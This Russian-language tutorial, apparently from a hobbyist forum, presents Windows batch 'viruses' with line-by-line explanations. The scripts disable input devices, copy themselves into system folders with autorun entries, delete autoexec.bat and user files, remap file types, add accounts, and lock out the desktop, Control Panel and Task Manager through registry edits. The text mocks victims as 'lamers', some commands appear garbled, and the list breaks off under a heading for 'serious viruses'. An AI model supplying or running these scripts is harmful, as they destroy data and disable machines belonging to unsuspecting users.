Вот собственно и сами вирусы 1)@echo off - Запрещаем ДОСовскому окошку показывать, что делает скрипт. 2)rundll32 keyboard,disable - Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C 3) rundll32 mouse,disable - Отключаем мышь тоже на всякий. 4) copy %0 %windir%/system - Копируемся в папку windows/system 5)// %0 - Переменная, указывающая на исходный файл-вирус // %windir% - переменная папка масдая. echo run=%windir%/system/*.bat » %windir%\win.ini - Добавляет текст "run=%windir%/system/*.bat" в файл win.ini 6) echo run=%windir%/system/*.bat » %windir%\system.ini - Добавляет текст "run=%windir%/system/*.bat" в файл system.ini 7) label LOHOLAMMER - Меняет имя диску c:\ на "LOHOLAMMER" 8) if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r - Проверяем если есть файл c:\autoexec.bat то убираем //у него атрибуты -h -s -a -r 9) deltree /y c:\autoexec.bat - Удаляем файл c:\autoexec.bat , если не убрать атрибуты, то программа не удалит файл. 10) echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat - Добавить текст "YOU ARE LAMMER...xe-xe-xe" //в новый файл autoexec.bat 11) rundll32 mouse,enable - Включаем, пускай думает, что ниче не было. 12)rundll32 keyboard,enable - Включаем, пускай думает, что ниче не было. 13) echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); » %temp%\mes.js start %temp%\mes.js. //Этот текст выводит масдайное окно с надписью deltree /y %temp%\mes.js //А потом стирает за собой следы. 14) attrib c:\autoexec.bat +h +s +a +r - Делает файл c:\autoexec.bat скрытым и системный чтоб ламер ничего не заподозрил. 15) pause - Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело.) 16)«copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat); 17)«label x:y» - переименовывает диск x на имя y (пример label C:Disc error); 18)«time х:у» - меняет время на х часов и у минут (пример time 14:27); 19)«date x.y.z» - меняет дату на x день, y месяц, z год (пример date 16.11.05); 20)«md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka); 21)«del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок); 22)«del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q); 23)«assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3); 24)«net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add); Простенькие вирусы Убирает рабочий стол Echo_inactive_inactive off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul Выключается компьютер Echo_inactive_inactive off shutdown -s -t 1 -c "lol" >nul Перезагрузка компьютера Echo_inactive_inactive off shutdown -r -t 1 -c "lol" >nul Запрещает запускать программы Echo_inactive_inactive off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul Удаление дров Echo_inactive_inactive off del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul Удаляет звуки Windows Echo_inactive_inactive off del "%SystemRoot%\Media" /q >nul Запрещает заходить в панель управления Echo_inactive_inactive off reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul Запрещает комбинацию Ctrl-Alt-Delete reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul Меняет местами значение кнопок мыши %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul Удаляет курсор мыши del "%SystemRoot%Cursors*.*" >nul Меняет название корзины reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F Убирает панель управления reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f Серьезные вирусы Удаляет